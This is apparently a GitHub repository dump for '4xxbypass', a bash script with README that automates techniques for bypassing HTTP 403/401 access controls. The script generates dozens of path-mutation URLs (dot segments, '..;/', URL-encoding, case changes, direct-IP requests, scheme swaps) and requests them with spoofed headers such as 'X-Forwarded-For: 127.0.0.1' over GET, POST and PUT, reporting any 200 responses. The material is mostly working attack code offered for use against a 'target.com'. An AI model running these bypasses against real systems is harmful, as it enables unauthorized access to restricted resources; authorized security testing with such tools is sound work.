├── 4xxbypass └── README.md /4xxbypass: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #if [ -z $1 ]; then echo "Usage: bypass4xx [URL]"; exit; fi 4 | 5 | urls=$(cat -) 6 | 7 | if [ -f 4xxpayloads ]; then rm 4xxpayloads; fi 8 | for url in $urls 9 | do 10 | echo "Doing $url" 11 | conlen=$(echo "$url" | httpx -silent -content-length -no-color | awk '{print $2}' | grep -Po "[0-9]+") 12 | base=$(echo "$(echo "$url" | cut -d/ -f1,2,3)") 13 | path=$(echo "/$(echo "$url" | cut -d/ -f4-)") #| sed 's/\/$//g') 14 | ips=$(dig "$(echo "$base" | cut -d/ -f 3)" +short) 15 | payloads=("$url") 16 | filename=$(echo $url | grep -oP "[^/]+/?$" | grep -Po "^[^/]+") 17 | fileurlenc=$(printf $filename | od -An -tx1 -v -w | tr ' ' % | sed 's/%0a//g') 18 | filename1st=$(printf $url | grep -oP "[^/]+/?$" | grep -oP ^.) 19 | fileurlenc1st=$(printf $filename1st | grep -oP "[^/]+/?$" | grep -oP ^. | od -An -tx1 -v -w | tr ' ' % | sed 's/%0a//g') 20 | 21 | # only the base 22 | #payloads+=($base) 23 | 24 | if [[ "$path" =~ "/"$ ]] 25 | then 26 | # /api => /api/. 27 | payloads+=("$base$(echo $path | awk '{print $0"."}')") 28 | 29 | # /api => /api/./ 30 | payloads+=("$base$(echo $path | awk '{print $0"./"}')") 31 | 32 | # /api => /api/* 33 | payloads+=("$base$(echo $path | awk '{print $0"*"}')") 34 | 35 | # /api => /api..;/ 36 | payloads+=("$base$(echo $path | sed 's/\/$/\.\.;\//g')") 37 | 38 | # /api => /api;/ 39 | payloads+=("$base$(echo $path | sed 's/\/$/;\//g')") 40 | 41 | # /api => /api/%20 42 | payloads+=("$base$(echo $path | awk '{print $0"%20"}')") 43 | 44 | # /api => /api/%2e 45 | payloads+=("$base$(echo $path | awk '{print $0"%2e"}')") 46 | 47 | # /api => /api/~ 48 | payloads+=("$base$(echo $path | awk '{print $0"~"}')") 49 | 50 | # /api => /api/%09 51 | payloads+=("$base$(echo $path | awk '{print $0"%09"}')") 52 | else 53 | # /api => /api/. 54 | payloads+=("$base$(echo $path | awk '{print $0"/."}')") 55 | 56 | # /api => /api/./ 57 | payloads+=("$base$(echo $path | awk '{print $0"/./"}')") 58 | 59 | # /api => /api/* 60 | payloads+=("$base$(echo $path | awk '{print $0"/*"}')") 61 | 62 | # /api => /api..;/ 63 | payloads+=("$base$(echo $path | awk '{print $0"..;/"}')") 64 | 65 | # /api => /api;/ 66 | payloads+=("$base$(echo $path | awk '{print $0";/"}')") 67 | 68 | # /api => /api/%20 69 | payloads+=("$base$(echo $path | awk '{print $0"/%20"}')") 70 | 71 | # /api => /api/%2e 72 | payloads+=("$base$(echo $path | awk '{print $0"/%2e"}')") 73 | 74 | # /api = /api/~ 75 | payloads+=("$base$(echo $path | awk '{print $0"/~"}')") 76 | 77 | # /api => /api/%09 78 | payloads+=("$base$(echo $path | awk '{print $0"/%09"}')") 79 | 80 | # /api => /api/.json 81 | payloads+=("$base$(echo $path | awk '{print $0"/.json"}')") 82 | fi 83 | 84 | # /api => /%61%70%69 85 | payloads+=("$base$(echo $path | sed "s/$filename/$fileurlenc/g")") 86 | 87 | # /api => /%61pi 88 | payloads+=("$base$(echo $path | sed "s/\(.*\)\/$filename1st/\1\/$fileurlenc1st/")") 89 | 90 | # /api => /api.json 91 | payloads+=("$base$(echo $path | awk '{print $0".json"}')") 92 | 93 | # /api => https://IP/api 94 | payloads+=($(echo $ips | grep -oP "[0-9]{2,}\.[0-9]{2,}\.[0-9]{2,}\.[0-9]{2,}" | httpx -silent | awk -v var=$path '{print $0var}')) 95 | 96 | # /api => /.;/api 97 | payloads+=("$base$(echo "/.;$path")") 98 | 99 | # /api => /api# 100 | payloads+=("$base$(echo $path | awk '{print $0"#"}')") 101 | 102 | # /api => /api?params 103 | payloads+=("$base$(echo $path | awk '{print $0"?gg"}')") 104 | 105 | # /api => /%20/api 106 | payloads+=("$base$(echo $path | sed 's/\//\/%20\//g')") 107 | 108 | # /api => /%2e/api 109 | payloads+=("$base$(echo $path | sed 's/\//\/%2e\//g')") 110 | 111 | # /api => /API 112 | payloads+=("$base$(echo $path | awk '{print toupper($0)}')") 113 | 114 | # /api => /./api 115 | payloads+=("$base$(echo $path | sed 's#/#/./#1')") 116 | 117 | # /api => //api 118 | payloads+=("$base$(echo $path | sed 's/\//\/\//g')") 119 | 120 | # https => http 121 | # http => https 122 | if [ $(echo "$url" | grep https | wc -l) -gt 0 ]; then 123 | payloads+=("$(echo $url | sed 's/https/http/g')") 124 | else 125 | payloads+=("$(echo $url | sed 's/http/https/g')") 126 | fi 127 | 128 | echo ${payloads[*]} | tr ' ' '\n' >> 4xxpayloads 129 | 130 | done 131 | 132 | echo "GET:" 133 | cat 4xxpayloads | httpx -silent -status-code -content-length -H "X-Forwarded-For: 127.0.0.1" -H "X-Forwarded-Host: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" | grep "\[.*200.*\]" 134 | 135 | echo "POST:" 136 | cat 4xxpayloads | httpx -silent -status-code -content-length -H "X-Forwarded-For: 127.0.0.1" -H "X-Forwarded-Host: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" -H "Content-length: 0" -x POST | grep "\[.*200.*\]" 137 | 138 | echo "PUT:" 139 | cat 4xxpayloads | httpx -silent -status-code -content-length -H "X-Forwarded-For: 127.0.0.1" -H "X-Forwarded-Host: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" -H "Content-length: 0" -x PUT | grep "\[.*200.*\]" 140 | rm 4xxpayloads 141 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 4xxbypass 2 | 3 | A tool that automates a number of well-known 403/401 bypassing techniques. 4 | 5 | # Usage 6 | 7 | `echo "https://target.com/this/is/a/403/page" | 4xxbypass` 8 | 9 | `cat urls.txt | 4xxbypass` 10 | 11 | # Proof of Concept 12 | 13 | ![](https://i.imgur.com/jmdkfl1.gif) 14 | 15 | # Installation 16 | 17 | 1- Install httpx if not already installed from (https://github.com/projectdiscovery/httpx) 18 | 19 | 2- `curl https://raw.githubusercontent.com/Raywando/4xxbypass/main/4xxbypass > /usr/bin/4xxbypass` 20 | 21 | 3- `chmod +x /usr/bin/4xxbypass` 22 | 23 | # Payloads 24 | 25 | ![](https://i.imgur.com/RfwGwjS.png) 26 | 27 | Along with adding the headers 28 | ``` 29 | X-Forwarded-For: 127.0.0.1 30 | X-Forwarded-Host: 127.0.0.1 31 | X-Custom-IP-Authorization: 127.0.0.1 32 | ``` 33 | 34 | # Reference 35 | 36 | https://github.com/KathanP19/HowToHunt/blob/fcd0ce1a0f9e83df08084402dfae02f3a5267ab5/Status_Code_Bypass/403Bypass.md 37 | --------------------------------------------------------------------------------